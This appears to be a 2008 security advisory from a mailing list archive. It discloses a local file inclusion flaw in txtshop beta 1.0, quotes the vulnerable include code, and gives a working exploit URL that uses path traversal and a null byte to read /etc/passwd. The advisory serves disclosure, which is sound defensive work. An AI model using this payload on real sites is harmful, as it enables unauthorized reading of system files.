Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :) vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability SiteEngine 5.x Multiple Remote Vulnerabilities iPei cross site scripting Vulnerablity From:Pepelux <pepelux_(at)_enye-sec.org> Date:29.10.2008Subject:txtshop - beta 1.0 / Local File Inclusion Vulnerability-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- txtshop - beta 1.0 / Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ Program: txtshop $ Version: <= 1.0 $ File affected: ADMIN/header.php $ Download: http://sourceforge.net/projects/txtshop/ Found by Pepelux <pepelux[at]enye-sec.org> eNYe-Sec - www.enye-sec.org --Bug -- 4. if (!$language)$language="ch"; 5. include_once("../lib/lang.".$language.".php"); -- Exploit -- http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)
vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
SiteEngine 5.x Multiple Remote Vulnerabilities
iPei cross site scripting Vulnerablity
